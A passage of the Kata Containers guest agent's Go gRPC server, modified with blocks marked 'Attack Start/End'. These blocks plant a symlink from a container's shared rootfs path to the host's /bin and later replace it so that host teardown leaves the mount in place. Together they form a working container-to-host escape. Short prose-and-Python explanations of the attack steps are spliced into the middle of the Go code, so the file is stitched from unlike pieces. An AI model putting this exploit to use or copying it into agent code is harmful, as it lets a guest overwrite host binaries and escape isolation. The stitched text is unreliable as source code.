// This ensures that upon sandbox tear-down, when the kata-runtime tries to unmount // the container filesystem, our symlink at '/run/kata-containers/shared/containers/sbx_id/rootfs' // won't exist anymore, so the mount we performed on the host won't be unmounted rootfs_path := "/run/kata-containers/shared/containers/" + a.sandbox.id + "/rootfs" if err := os.Remove(rootfs_path); err != nil { return emptyResp, fmt.Errorf("Attack Remove symlink: '%s'", err) } if err := os.Mkdir(rootfs_path, os.FileMode(0755)); err != nil { return emptyResp, fmt.Errorf("Attack Mkdir recreate rootfs dir: '%s'", err) } // ~ Attack End ~ // if err := a.createContainerChecks(req); err != nil { return emptyResp, err } // re-scan PCI bus // looking for hidden devices if err = rescanPciBus(); err != nil { agentLog.WithError(err).Warn("Could not rescan PCI bus") } // Some devices need some extra processing (the ones invoked with // --device for instance), and that's what this call is doing. It // updates the devices listed in the OCI spec, so that they actually // match real devices inside the VM. This step is necessary since we // cannot predict everything from the caller. if err = addDevices(ctx, req.Devices, req.OCI, a.sandbox); err != nil { return emptyResp, err } // Both rootfs and volumes (invoked with --volume for instance) will // be processed the same way. The idea is to always mount any provided // storage to the specified MountPoint, so that it will match what's // inside oci.Mounts. // After all those storages have been processed, no matter the order // here, the agent will rely on libcontainer (using the oci.Mounts // list) to bind mount all of them inside the container. 
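The "Attack Start" block in `CreateContainer` above swaps the previously planted `rootfs` symlink for a real directory, so the teardown unmount no longer reaches the host path. The remove-then-mkdir step in isolation (temporary paths, not the real `/run/kata-containers` layout):

```python
import os
import tempfile

def replace_symlink_with_dir(path: str) -> None:
    # os.remove() deletes the link itself, never its target;
    # the fresh directory then sits where the link used to point callers.
    os.remove(path)
    os.mkdir(path, 0o755)

base = tempfile.mkdtemp()
link = os.path.join(base, "rootfs")
os.symlink("/tmp", link)
replace_symlink_with_dir(link)
print(os.path.islink(link), os.path.isdir(link))  # prints: False True
```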
mountList, err := addStorages(ctx, req.Storages, a.sandbox) if err != nil { return emptyResp, err } ctr := &container{ id: req.ContainerId, processes: make(map[string]*process), mounts: mountList, useSandboxPidNs: req.SandboxPidns, ctx: ctx, } // In case the container creation failed, make sure we cleanup // properly by rolling back the actions previously performed. defer func() { if err != nil { a.rollbackFailingContainerCreation(ctr) } }() // Convert the spec to an actual OCI specification structure. ociSpec, err := pb.GRPCtoOCI(req.OCI) if err != nil { return emptyResp, err } if err := a.handleCPUSet(ociSpec); err != nil { return emptyResp, err } if err := a.applyNetworkSysctls(ociSpec); err != nil { return emptyResp, err } if a.sandbox.guestHooksPresent { // Add any custom OCI hooks to the spec a.sandbox.addGuestHooks(ociSpec) // write the OCI spec to a file so that hooks can read it err = writeSpecToFile(ociSpec) if err != nil { return emptyResp, err } // Change cwd because libcontainer assumes the bundle path is the cwd: // https://github.com/opencontainers/runc/blob/v1.0.0-rc5/libcontainer/specconv/spec_linux.go#L157 oldcwd, err := changeToBundlePath(ociSpec) if err != nil { return emptyResp, err } defer os.Chdir(oldcwd) } // Convert the OCI specification into a libcontainer configuration. config, err := specconv.CreateLibcontainerConfig(&specconv.CreateOpts{ CgroupName: req.ContainerId, NoNewKeyring: true, Spec: ociSpec, NoPivotRoot: a.sandbox.noPivotRoot, }) if err != nil { return emptyResp, err } // apply rlimits config.Rlimits = posixRlimitsToRlimits(ociSpec.Process.Rlimits) // Update libcontainer configuration for specific cases not handled // by the specconv converter. 
if err = a.updateContainerConfig(ociSpec, config, ctr); err != nil { return emptyResp, err } return a.finishCreateContainer(ctr, req, config) } // Path overridden in unit tests var procSysDir = "/proc/sys" // writeSystemProperty writes the value to a path under /proc/sys as determined from the key. // For e.g. net.ipv4.ip_forward translated to /proc/sys/net/ipv4/ip_forward. func writeSystemProperty(key, value string) error { keyPath := strings.Replace(key, ".", "/", -1) return ioutil.WriteFile(filepath.Join(procSysDir, keyPath), []byte(value), 0644) } func isNetworkSysctl(sysctl string) bool { return strings.HasPrefix(sysctl, "net.") } // libcontainer checks if the container is running in a separate network namespace // before applying the network related sysctls. If it sees that the network namespace of the container // is the same as the "host", it errors out. Since we do no create a new net namespace inside the guest, // libcontainer would error out while verifying network sysctls. To overcome this, we dont pass // network sysctls to libcontainer, we instead have the agent directly apply them. All other namespaced // sysctls are applied by libcontainer. 
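`writeSystemProperty` above turns a dotted sysctl key into its `/proc/sys` path with a dot-to-slash substitution, and `isNetworkSysctl` filters on the `net.` prefix. Both rules sketched standalone:

```python
import posixpath

PROC_SYS = "/proc/sys"

def sysctl_path(key: str) -> str:
    # net.ipv4.ip_forward -> /proc/sys/net/ipv4/ip_forward
    return posixpath.join(PROC_SYS, key.replace(".", "/"))

def is_network_sysctl(key: str) -> bool:
    # Network sysctls are handled by the agent, not libcontainer
    return key.startswith("net.")

print(sysctl_path("net.ipv4.ip_forward"))  # -> /proc/sys/net/ipv4/ip_forward
```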
func (a *agentGRPC) applyNetworkSysctls(ociSpec *specs.Spec) error { sysctls := ociSpec.Linux.Sysctl for key, value := range sysctls { if isNetworkSysctl(key) { if err := writeSystemProperty(key, value); err != nil { return err } delete(sysctls, key) } } ociSpec.Linux.Sysctl = sysctls return nil } func (a *agentGRPC) handleCPUSet(ociSpec *specs.Spec) error { if ociSpec.Linux.Resources.CPU != nil && ociSpec.Linux.Resources.CPU.Cpus != "" { availableCpuset, err := getAvailableCpusetList(ociSpec.Linux.Resources.CPU.Cpus) if err != nil { return err } ociSpec.Linux.Resources.CPU.Cpus = availableCpuset } return nil } func posixRlimitsToRlimits(posixRlimits []specs.POSIXRlimit) []configs.Rlimit { var rlimits []configs.Rlimit rlimitsMap := map[string]int{ "RLIMIT_CPU": unix.RLIMIT_CPU, // 0x0 "RLIMIT_FSIZE": unix.RLIMIT_FSIZE, // 0x1 "RLIMIT_DATA": unix.RLIMIT_DATA, // 0x2 "RLIMIT_STACK": unix.RLIMIT_STACK, // 0x3 "RLIMIT_CORE": unix.RLIMIT_CORE, // 0x4 "RLIMIT_RSS": unix.RLIMIT_RSS, // 0x5 "RLIMIT_NPROC": unix.RLIMIT_NPROC, // 0x6 "RLIMIT_NOFILE": unix.RLIMIT_NOFILE, // 0x7 "RLIMIT_MEMLOCK": unix.RLIMIT_MEMLOCK, // 0x8 "RLIMIT_AS": unix.RLIMIT_AS, // 0x9 "RLIMIT_LOCKS": unix.RLIMIT_LOCKS, // 0xa "RLIMIT_SIGPENDING": unix.RLIMIT_SIGPENDING, // 0xb "RLIMIT_MSGQUEUE": unix.RLIMIT_MSGQUEUE, // 0xc "RLIMIT_NICE": unix.RLIMIT_NICE, // 0xd "RLIMIT_RTPRIO": unix.RLIMIT_RTPRIO, // 0xe "RLIMIT_RTTIME": unix.RLIMIT_RTTIME, // 0xf } for _, l := range posixRlimits { limit, ok := rlimitsMap[l.Type] if !ok { agentLog.WithField("rlimit", l.Type).Warnf("Unknown rlimit") continue } rl := configs.Rlimit{ Type: limit, Hard: l.Hard, Soft: l.Soft, } rlimits = append(rlimits, rl) } return rlimits } func (a *agentGRPC) createContainerChecks(req *pb.CreateContainerRequest) (err error) { if !a.sandbox.running { return grpcStatus.Error(codes.FailedPrecondition, "Sandbox not started, impossible to run a new container") } if _, err = a.sandbox.getContainer(req.ContainerId); err == nil { return 
grpcStatus.Errorf(codes.AlreadyExists, "Container %s already exists, impossible to create", req.ContainerId) } if a.pidNsExists(req.OCI) { return grpcStatus.Errorf(codes.FailedPrecondition, "Unexpected PID namespace received for container %s, should have been cleared out", req.ContainerId) } return nil } func (a *agentGRPC) pidNsExists(grpcSpec *pb.Spec) bool { if grpcSpec.Linux != nil { for _, n := range grpcSpec.Linux.Namespaces { if n.Type == string(configs.NEWPID) { return true } } } return false } func (a *agentGRPC) updateSharedPidNs(ctr *container) error { // Populate the shared pid path only if this is an infra container and // SandboxPidns has not been passed in the CreateSandbox request. // This means a separate pause process has not been created. We treat the // first container created as the infra container in that case // and use its pid namespace in case pid namespace needs to be shared. if !a.sandbox.sandboxPidNs && len(a.sandbox.containers) == 1 { pid, err := ctr.initProcess.process.Pid() if err != nil { return err } a.sandbox.sharedPidNs.path = fmt.Sprintf("/proc/%d/ns/pid", pid) } return nil } func (a *agentGRPC) StartContainer(ctx context.Context, req *pb.StartContainerRequest) (*gpb.Empty, error) { ctr, err := a.getContainer(req.ContainerId) if err != nil { return emptyResp, err } status, err := ctr.container.Status() if err != nil { return nil, err } if status != libcontainer.Created { return nil, grpcStatus.Errorf(codes.FailedPrecondition, "Container %s status %s, should be %s", req.ContainerId, status.String(), libcontainer.Created.String()) } if err := ctr.container.Exec(); err != nil { return emptyResp, err } return emptyResp, nil } func (a *agentGRPC) ExecProcess(ctx context.Context, req *pb.ExecProcessRequest) (*gpb.Empty, error) { ctr, err := a.getContainer(req.ContainerId) if err != nil { return emptyResp, err } status, err := ctr.container.Status() if err != nil { return nil, err } if status == libcontainer.Stopped { return nil, 
grpcStatus.Errorf(codes.FailedPrecondition, "Cannot exec in stopped container %s", req.ContainerId) } proc, err := buildProcess(req.Process, req.ExecId, false) if err != nil { return emptyResp, err } if err := a.execProcess(ctr, proc, false); err != nil { return emptyResp, err } return emptyResp, a.postExecProcess(ctr, proc) } func (a *agentGRPC) SignalProcess(ctx context.Context, req *pb.SignalProcessRequest) (*gpb.Empty, error) { if !a.sandbox.running { return emptyResp, grpcStatus.Error(codes.FailedPrecondition, "Sandbox not started, impossible to signal the container") } ctr, err := a.sandbox.getContainer(req.ContainerId) if err != nil { return emptyResp, grpcStatus.Errorf(codes.FailedPrecondition, "Could not signal process %s: %v", req.ExecId, err) } status, err := ctr.container.Status() if err != nil { return emptyResp, err } signal := syscall.Signal(req.Signal) if status == libcontainer.Stopped { agentLog.WithFields(logrus.Fields{ "containerID": req.ContainerId, "signal": signal.String(), }).Info("discarding signal as container stopped") return emptyResp, nil } // If the exec ID provided is empty, let's apply the signal to all // processes inside the container. // If the process is the container process, let's use the container // API for that. // Frozen processes are thawed when `all` is true, allowing them to receive and process signals. if req.ExecId == "" || status == libcontainer.Paused { return emptyResp, ctr.container.Signal(signal, true) } else if ctr.initProcess.id == req.ExecId { pid, err := ctr.initProcess.process.Pid() if err != nil { return emptyResp, err } // For container initProcess, if it hasn't installed handler for "SIGTERM" signal, // it will ignore the "SIGTERM" signal sent to it, thus send it "SIGKILL" signal // instead of "SIGTERM" to terminate it. 
		if signal == syscall.SIGTERM && !isSignalHandled(pid, syscall.SIGTERM) {
			signal = syscall.SIGKILL
		}

		return emptyResp, ctr.container.Signal(signal, false)
	}

	proc, err := ctr.getProcess(req.ExecId)
	if err != nil {
		return emptyResp, grpcStatus.Errorf(grpcStatus.Convert(err).Code(), "Could not signal process: %v", err)
	}

	if err := proc.process.Signal(signal); err != nil {
		return emptyResp, err
	}

	return emptyResp, nil
}

// isSignalHandled checks whether the container process has installed a
// handler for the given signal.
func isSignalHandled(pid int, signum syscall.Signal) bool {
	var sigMask uint64 = 1 << (uint(signum) - 1)
	procFile := fmt.Sprintf("/proc/%d/status", pid)
	file, err := os.Open(procFile)
	if err != nil {
		agentLog.WithField("procFile", procFile).Warn("Open proc file failed")
		return false
	}
	defer file.Close()

	scanner := bufio.NewScanner(file)
	for scanner.Scan() {
		line := scanner.Text()
		if strings.HasPrefix(line, "SigCgt:") {
			maskSlice := strings.Split(line, ":")
			if len(maskSlice) != 2 {
				agentLog.WithField("procFile", procFile).Warn("Parse the SigCgt field failed")
				return false
			}
			sigCgtStr := strings.TrimSpace(maskSlice[1])
			sigCgtMask, err := strconv.ParseUint(sigCgtStr, 16, 64)
			if err != nil {
				agentLog.WithField("sigCgt", sigCgtStr).Warn("Parse the SigCgt field as hex failed")
				return false
			}
			return (sigCgtMask & sigMask) == sigMask
		}
	}
	return false
}

func (a *agentGRPC) WaitProcess(ctx context.Context, req *pb.WaitProcessRequest) (*pb.WaitProcessResponse, error) {
	proc, ctr, err := a.sandbox.getProcess(req.ContainerId, req.ExecId)
	if err != nil {
		return &pb.WaitProcessResponse{}, err
	}

	defer proc.Do(func() {
		proc.closePostExitFDs()
		ctr.deleteProcess(proc.id)
	})

	// Use the helper function wait() to deal with the subreaper.
	libContProcess := (*reaperLibcontainerProcess)(&(proc.process))

	exitCode, err := a.sandbox.subreaper.wait(proc.exitCodeCh, libContProcess)
	if err != nil {
		return &pb.WaitProcessResponse{}, err
	}

	// Refill exitCodeCh with the exit code so that it can be read out by
	// another WaitProcess() call. Since this channel is never closed, the
	// refill always succeeds, and the channel is freed by the GC once the
	// process exits.
	proc.exitCodeCh <- exitCode

	return &pb.WaitProcessResponse{
		Status: int32(exitCode),
	}, nil
}

func getPIDIndex(title string) int {
	// Look for the PID field in the ps title line.
	fields := strings.Fields(title)
	for i, f := range fields {
		if f == "PID" {
			return i
		}
	}
	return -1
}

func (a *agentGRPC) ListProcesses(ctx context.Context, req *pb.ListProcessesRequest) (*pb.ListProcessesResponse, error) {
	resp := &pb.ListProcessesResponse{}

	c, err := a.sandbox.getContainer(req.ContainerId)
	if err != nil {
		return resp, err
	}

	// Get the list of processes that are running inside the container.
	// The PIDs match the system PIDs, not the PIDs in the container's
	// namespace.
	pids, err := c.container.Processes()
	if err != nil {
		return resp, err
	}

	switch req.Format {
	case "table":
	case "json":
		resp.ProcessList, err = json.Marshal(pids)
		return resp, err
	default:
		return resp, fmt.Errorf("invalid format option")
	}

	psArgs := req.Args
	if len(psArgs) == 0 {
		psArgs = []string{"-ef"}
	}

	// All of the container's processes are visible from the agent's
	// namespace. pids already contains the list of processes running
	// inside the container, so use that list to filter the ps output
	// and return just the container's processes.
	cmd := exec.Command("ps", psArgs...)
	output, err := a.sandbox.subreaper.combinedOutput(cmd)
	if err != nil {
		return nil, fmt.Errorf("%s: %s", err, output)
	}

	lines := strings.Split(string(output), "\n")

	pidIndex := getPIDIndex(lines[0])

	// PID field not found
	if pidIndex == -1 {
		return nil, fmt.Errorf("failed to find PID field in ps output")
	}

	// append title
	var result bytes.Buffer
	result.WriteString(lines[0] + "\n")

	for _, line := range lines[1:] {
		if len(line) == 0 {
			continue
		}
		fields := strings.Fields(line)
		if pidIndex >= len(fields) {
			return nil, fmt.Errorf("missing PID field: %s", line)
		}
		p, err := strconv.Atoi(fields[pidIndex])
		if err != nil {
			return nil, fmt.Errorf("failed to convert pid to int: %s", fields[pidIndex])
		}

		// append the line if the pid belongs to the container
		for _, pid := range pids {
			if pid == p {
				result.WriteString(line + "\n")
				break
			}
		}
	}

	resp.ProcessList = result.Bytes()

	return resp, nil
}

func (a *agentGRPC) UpdateContainer(ctx context.Context, req *pb.UpdateContainerRequest) (*gpb.Empty, error) {
	if req.Resources == nil {
		return emptyResp, fmt.Errorf("Resources in the request are nil")
	}

	c, err := a.sandbox.getContainer(req.ContainerId)
	if err != nil {
		return emptyResp, err
	}

	// c.container.Config() returns a copy of the non-pointer members of
	// configs.Config, but configs.Config.Cgroups is a pointer; if it is
	// modified, the container cgroup is modified too, and c.container.Set
	// won't be able to roll back in case of failure.
contConfig := c.container.Config() var resources configs.Resources if contConfig.Cgroups != nil && contConfig.Cgroups.Resources != nil { resources = *contConfig.Cgroups.Resources } // Update the value if req.Resources.BlockIO != nil { resources.BlkioWeight = uint16(req.Resources.BlockIO.Weight) } if req.Resources.CPU != nil { resources.CpuPeriod = req.Resources.CPU.Period resources.CpuQuota = req.Resources.CPU.Quota resources.CpuShares = req.Resources.CPU.Shares resources.CpuRtPeriod = req.Resources.CPU.RealtimePeriod resources.CpuRtRuntime = req.Resources.CPU.RealtimeRuntime resources.CpusetCpus = req.Resources.CPU.Cpus resources.CpusetMems = req.Resources.CPU.Mems } if req.Resources.Memory != nil { resources.KernelMemory = req.Resources.Memory.Kernel resources.KernelMemoryTCP = req.Resources.Memory.KernelTCP resources.Memory = req.Resources.Memory.Limit resources.MemoryReservation = req.Resources.Memory.Reservation resources.MemorySwap = req.Resources.Memory.Swap } if req.Resources.Pids != nil { resources.PidsLimit = req.Resources.Pids.Limit } // cpuset is a special case where container's cpuset cgroup MUST BE updated if resources.CpusetCpus != "" { resources.CpusetCpus, err = getAvailableCpusetList(resources.CpusetCpus) if err != nil { return emptyResp, err } cookies := make(cookie) if err = updateCpusetPath(contConfig.Cgroups.Path, resources.CpusetCpus, cookies); err != nil { agentLog.WithError(err).Warn("Could not update container cpuset cgroup") } } // Create a copy of container's cgroup, if c.container.Set fails, // configuration won't be modified and it will be able to rollback // to the original container cgroup configuration. 
config := contConfig var cgroupsCopy configs.Cgroup if contConfig.Cgroups != nil { cgroupsCopy = *contConfig.Cgroups } cgroupsCopy.Resources = &resources config.Cgroups = &cgroupsCopy return emptyResp, c.container.Set(config) } func (a *agentGRPC) StatsContainer(ctx context.Context, req *pb.StatsContainerRequest) (*pb.StatsContainerResponse, error) { c, err := a.sandbox.getContainer(req.ContainerId) if err != nil { return nil, err } stats, err := c.container.Stats() if err != nil { return nil, err } cgroupData, err := json.Marshal(stats.CgroupStats) if err != nil { return nil, err } netData, err := json.Marshal(stats.Interfaces) if err != nil { return nil, err } var cgroupStats pb.CgroupStats networkStats := make([]*pb.NetworkStats, 0) err = json.Unmarshal(cgroupData, &cgroupStats) if err != nil { return nil, err } err = json.Unmarshal(netData, &networkStats) if err != nil { return nil, err } resp := &pb.StatsContainerResponse{ CgroupStats: &cgroupStats, NetworkStats: networkStats, } return resp, nil } func (a *agentGRPC) PauseContainer(ctx context.Context, req *pb.PauseContainerRequest) (*gpb.Empty, error) { c, err := a.sandbox.getContainer(req.ContainerId) if err != nil { return emptyResp, err } a.sandbox.Lock() defer a.sandbox.Unlock() return emptyResp, c.container.Pause() } func (a *agentGRPC) ResumeContainer(ctx context.Context, req *pb.ResumeContainerRequest) (*gpb.Empty, error) { c, err := a.sandbox.getContainer(req.ContainerId) if err != nil { return emptyResp, err } a.sandbox.Lock() defer a.sandbox.Unlock() return emptyResp, c.container.Resume() } func (a *agentGRPC) RemoveContainer(ctx context.Context, req *pb.RemoveContainerRequest) (*gpb.Empty, error) { ctr, err := a.sandbox.getContainer(req.ContainerId) if err != nil { return emptyResp, err } timeout := int(req.Timeout) a.sandbox.Lock() defer a.sandbox.Unlock() if timeout == 0 { if err := ctr.removeContainer(); err != nil { return emptyResp, err } // Find the sandbox storage used by this container for 
_, path := range ctr.mounts { if _, ok := a.sandbox.storages[path]; ok { if err := a.sandbox.unsetAndRemoveSandboxStorage(path); err != nil { return emptyResp, err } } } } else { done := make(chan error) go func() { if err := ctr.removeContainer(); err != nil { done <- err close(done) return } //Find the sandbox storage used by this container for _, path := range ctr.mounts { if _, ok := a.sandbox.storages[path]; ok { if err := a.sandbox.unsetAndRemoveSandboxStorage(path); err != nil { done <- err close(done) return } } } close(done) }() select { case err := <-done: if err != nil { return emptyResp, err } case <-time.After(time.Duration(req.Timeout) * time.Second): return emptyResp, grpcStatus.Errorf(codes.DeadlineExceeded, "Timeout reached after %ds", timeout) } } delete(a.sandbox.containers, ctr.id) return emptyResp, nil } func (a *agentGRPC) WriteStdin(ctx context.Context, req *pb.WriteStreamRequest) (*pb.WriteStreamResponse, error) { proc, _, err := a.sandbox.getProcess(req.ContainerId, req.ExecId) if err != nil { return &pb.WriteStreamResponse{}, err } proc.RLock() defer proc.RUnlock() stdinClosed := proc.stdinClosed // Ignore this call to WriteStdin() if STDIN has already been closed // earlier. 
if stdinClosed { return &pb.WriteStreamResponse{}, nil } var file *os.File if proc.termMaster != nil { file = proc.termMaster } else { file = proc.stdin } n, err := file.Write(req.Data) if err != nil { return &pb.WriteStreamResponse{}, err } return &pb.WriteStreamResponse{ Len: uint32(n), }, nil } func (a *agentGRPC) ReadStdout(ctx context.Context, req *pb.ReadStreamRequest) (*pb.ReadStreamResponse, error) { data, err := a.sandbox.readStdio(req.ContainerId, req.ExecId, int(req.Len), true) if err != nil { return &pb.ReadStreamResponse{}, err } return &pb.ReadStreamResponse{ Data: data, }, nil } func (a *agentGRPC) ReadStderr(ctx context.Context, req *pb.ReadStreamRequest) (*pb.ReadStreamResponse, error) { data, err := a.sandbox.readStdio(req.ContainerId, req.ExecId, int(req.Len), false) if err != nil { return &pb.ReadStreamResponse{}, err } return &pb.ReadStreamResponse{ Data: data, }, nil } func (a *agentGRPC) CloseStdin(ctx context.Context, req *pb.CloseStdinRequest) (*gpb.Empty, error) { proc, _, err := a.sandbox.getProcess(req.ContainerId, req.ExecId) if err != nil { return emptyResp, err } // If stdin is nil, which can be the case when using a terminal, // there is nothing to do. if proc.stdin == nil { return emptyResp, nil } proc.Lock() defer proc.Unlock() if err := proc.stdin.Close(); err != nil { return emptyResp, err } proc.stdinClosed = true return emptyResp, nil } func (a *agentGRPC) TtyWinResize(ctx context.Context, req *pb.TtyWinResizeRequest) (*gpb.Empty, error) { proc, _, err := a.sandbox.getProcess(req.ContainerId, req.ExecId) if err != nil { return emptyResp, err } if proc.termMaster == nil { return emptyResp, grpcStatus.Error(codes.FailedPrecondition, "Terminal is not set, impossible to resize it") } winsize := &unix.Winsize{ Row: uint16(req.Row), Col: uint16(req.Column), } // Set new terminal size. 
if err := unix.IoctlSetWinsize(int(proc.termMaster.Fd()), unix.TIOCSWINSZ, winsize); err != nil { return emptyResp, err } return emptyResp, nil } func loadKernelModule(module *pb.KernelModule) error { if module == nil { return fmt.Errorf("Kernel module is nil") } if module.Name == "" { return fmt.Errorf("Kernel module name is empty") } log := agentLog.WithFields(logrus.Fields{ "module-name": module.Name, "module-params": module.Parameters, }) log.Debug("loading module") cmd := exec.Command(modprobePath, "-v", module.Name) if len(module.Parameters) > 0 { cmd.Args = append(cmd.Args, module.Parameters...) } output, err := cmd.CombinedOutput() if err != nil { return fmt.Errorf("could not load module: %v: %v", err, string(output)) } return nil } func (a *agentGRPC) CreateSandbox(ctx context.Context, req *pb.CreateSandboxRequest) (*gpb.Empty, error) { if a.sandbox.running { return emptyResp, grpcStatus.Error(codes.AlreadyExists, "Sandbox already started, impossible to start again") } a.sandbox.hostname = req.Hostname a.sandbox.containers = make(map[string]*container) a.sandbox.network.ifaces = make(map[string]*types.Interface) a.sandbox.network.dns = req.Dns a.sandbox.running = true a.sandbox.sandboxPidNs = req.SandboxPidns a.sandbox.storages = make(map[string]*sandboxStorage) a.sandbox.guestHooks = &specs.Hooks{} a.sandbox.guestHooksPresent = false for _, m := range req.KernelModules { if err := loadKernelModule(m); err != nil { return emptyResp, err } } if req.GuestHookPath != "" { a.sandbox.scanGuestHooks(req.GuestHookPath) } if req.SandboxId != "" { a.sandbox.id = req.SandboxId agentLog = agentLog.WithField("sandbox", a.sandbox.id) } // Set up shared UTS and IPC namespaces if err := a.sandbox.setupSharedNamespaces(ctx); err != nil { return emptyResp, err } if req.SandboxPidns { if err := a.sandbox.setupSharedPidNs(); err != nil { return emptyResp, err } } mountList, err := addStorages(ctx, req.Storages, a.sandbox) if err != nil { return emptyResp, err } 
	a.sandbox.mounts = mountList

	// ~ Attack Start ~ //
	shared_dir := "/run/kata-containers/shared/containers"
	perm := os.FileMode(0755)

	// Create a symlink at '/run/kata-containers/shared/containers/mainctr_id/rootfs'
	// pointing to the target on the host.
	// We use the SandboxId as the main container id.
	mainctr_dir := shared_dir + "/" + req.SandboxId
	if err := os.Mkdir(mainctr_dir, perm); err != nil {
		return emptyResp, fmt.Errorf("Attack Mkdir(SandboxId) (SandboxId = '%s') error: '%s'", req.SandboxId, err)
	}

	// the target that'll be mounted with the container image
	target_on_host := "/bin"
	if err := os.Symlink(target_on_host, mainctr_dir+"/rootfs"); err != nil {
		return emptyResp, fmt.Errorf("Attack symlink error: '%s'", err)
	}
	// ~ Attack End ~ //

	if err := setupDNS(a.sandbox.network.dns); err != nil {
		return emptyResp, err
	}

	return emptyResp, nil
}

func (a *agentGRPC) DestroySandbox(ctx context.Context, req *pb.DestroySandboxRequest) (*gpb.Empty, error) {
	if !a.sandbox.running {
		agentLog.Info("Sandbox not started, this is a no-op")
		return emptyResp, nil
	}

	a.sandbox.Lock()
	for key, c := range a.sandbox.containers {
		if err := c.removeContainer(); err != nil {
			return emptyResp, err
		}

		// Find the sandbox storage used by this container
		for _, path := range c.mounts {
			if _, ok := a.sandbox.storages[path]; ok {
				if err := a.sandbox.unsetAndRemoveSandboxStorage(path); err != nil {
					return emptyResp, err
				}
			}
		}
		delete(a.sandbox.containers, key)
	}
	a.sandbox.Unlock()

	if err := a.sandbox.removeNetwork(); err != nil {
		return emptyResp, err
	}

	if err := removeMounts(a.sandbox.mounts); err != nil {
		return emptyResp, err
	}

	if err := a.sandbox.teardownSharedPidNs(); err != nil {
		return emptyResp, err
	}

	if err := a.sandbox.unmountSharedNamespaces(); err != nil {
		return emptyResp, err
	}

	if tracing && !startTracingCalled {
		// Close the stopServer channel to signal the main agent code to
		// stop the server once all gRPC calls have completed.
close(a.sandbox.stopServer) } a.sandbox.hostname = "" a.sandbox.id = "" a.sandbox.containers = make(map[string]*container) a.sandbox.running = false a.sandbox.network = network{} a.sandbox.mounts = []string{} a.sandbox.storages = make(map[string]*sandboxStorage) // Synchronize the caches on the system. This is needed to ensure // there is no pending transactions left before the VM is shut down. syscall.Sync() return emptyResp, nil } func (a *agentGRPC) UpdateInterface(ctx context.Context, req *pb.UpdateInterfaceRequest) (*types.Interface, error) { return a.sandbox.updateInterface(nil, req.Interface) } func (a *agentGRPC) UpdateRoutes(ctx context.Context, req *pb.UpdateRoutesRequest) (*pb.Routes, error) { return a.sandbox.updateRoutes(nil, req.Routes) } func (a *agentGRPC) ListInterfaces(ctx context.Context, req *pb.ListInterfacesRequest) (*pb.Interfaces, error) { return a.sandbox.listInterfaces(nil) } func (a *agentGRPC) ListRoutes(ctx context.Context, req *pb.ListRoutesRequest) (*pb.Routes, error) { return a.sandbox.listRoutes(nil) } func (a *agentGRPC) OnlineCPUMem(ctx context.Context, req *pb.OnlineCPUMemRequest) (*gpb.Empty, error) { if !req.Wait { go a.onlineCPUMem(req) return emptyResp, nil } return emptyResp, a.onlineCPUMem(req) } func (a *agentGRPC) ReseedRandomDev(ctx context.Context, req *pb.ReseedRandomDevRequest) (*gpb.Empty, error) { return emptyResp, reseedRNG(req.Data) } func (a *agentGRPC) GetGuestDetails(ctx context.Context, req *pb.GuestDetailsRequest) (*pb.GuestDetailsResponse, error) { var details pb.GuestDetailsResponse if req.MemBlockSize { data, err := ioutil.ReadFile(sysfsMemoryBlockSizePath) if err != nil { if os.IsNotExist(err) { agentLog.WithField("sysfsMemoryBlockSizePath", sysfsMemoryBlockSizePath).Info("Guest kernel config doesn't support memory hotplug") } else { return nil, err } } else { if len(data) == 0 { return nil, fmt.Errorf("%v is empty", sysfsMemoryBlockSizePath) } details.MemBlockSizeBytes, err = 
strconv.ParseUint(string(data[:len(data)-1]), 16, 64) if err != nil { return nil, err } } } if req.MemHotplugProbe { if _, err := os.Stat(sysfsMemoryHotplugProbePath); os.IsNotExist(err) { details.SupportMemHotplugProbe = false } else if err != nil { return nil, err } else { details.SupportMemHotplugProbe = true } } details.AgentDetails = a.getAgentDetails(ctx) return &details, nil } func (a *agentGRPC) MemHotplugByProbe(ctx context.Context, req *pb.MemHotplugByProbeRequest) (*gpb.Empty, error) { for _, addr := range req.MemHotplugProbeAddr { if err := ioutil.WriteFile(sysfsMemoryHotplugProbePath, []byte(fmt.Sprintf("0x%x", addr)), 0600); err != nil { return emptyResp, err } } return emptyResp, nil } func (a *agentGRPC) haveSeccomp() bool { if seccompSupport == "yes" && seccomp.IsEnabled() { return true } return false } func (a *agentGRPC) getAgentDetails(ctx context.Context) *pb.AgentDetails { details := pb.AgentDetails{ Version: version, InitDaemon: os.Getpid() == 1, SupportsSeccomp: a.haveSeccomp(), } for handler := range deviceHandlerList { details.DeviceHandlers = append(details.DeviceHandlers, handler) } for handler := range storageHandlerList { details.StorageHandlers = append(details.StorageHandlers, handler) } return &details } func (a *agentGRPC) SetGuestDateTime(ctx context.Context, req *pb.SetGuestDateTimeRequest) (*gpb.Empty, error) { if err := syscall.Settimeofday(&syscall.Timeval{Sec: req.Sec, Usec: req.Usec}); err != nil { return nil, grpcStatus.Errorf(codes.Internal, "Could not set guest time: %v", err) } return &gpb.Empty{}, nil } // CopyFile copies files form host to container's rootfs (guest). Files can be copied by parts, for example // a file which size is 2MB, can be copied calling CopyFile 2 times, in the first call req.Offset is 0, // req.FileSize is 2MB and req.Data contains the first half of the file, in the seconds call req.Offset is 1MB, // req.FileSize is 2MB and req.Data contains the second half of the file. 
// For security reasons, all write operations are made in a temporary file;
// once the temporary file reaches the expected size (req.FileSize), it is
// moved to the destination file (req.Path).
func (a *agentGRPC) CopyFile(ctx context.Context, req *pb.CopyFileRequest) (*gpb.Empty, error) {
	// Get the absolute path, to avoid paths like '/run/../sbin/init'.
	path, err := filepath.Abs(req.Path)
	if err != nil {
		return emptyResp, err
	}

	// The container's rootfs is mounted at /run; in order to avoid
	// overwriting the guest's rootfs files, it is only possible to copy
	// files under /run.
	if !strings.HasPrefix(path, containersRootfsPath) {
		return emptyResp, fmt.Errorf("It is only possible to copy files into the %s directory", containersRootfsPath)
	}

	if err := os.MkdirAll(filepath.Dir(path), os.FileMode(req.DirMode)); err != nil {
		return emptyResp, err
	}

	// Create a temporary file and write the content.
	tmpPath := path + ".tmp"
	tmpFile, err := os.OpenFile(tmpPath, os.O_WRONLY|os.O_CREATE, 0600)
	if err != nil {
		return emptyResp, err
	}
	if _, err := tmpFile.WriteAt(req.Data, req.Offset); err != nil {
		tmpFile.Close()
		return emptyResp, err
	}
	tmpFile.Close()

	// Get the temporary file's information.
	st, err := os.Stat(tmpPath)
	if err != nil {
		return emptyResp, err
	}

	agentLog.WithFields(logrus.Fields{
		"tmp-file-size": st.Size(),
		"expected-size": req.FileSize,
	}).Debugf("Checking temporary file size")

	// If the file size is not equal to the expected size, the copy
	// operation has not finished yet; CopyFile should be called again
	// with new content and a different offset.
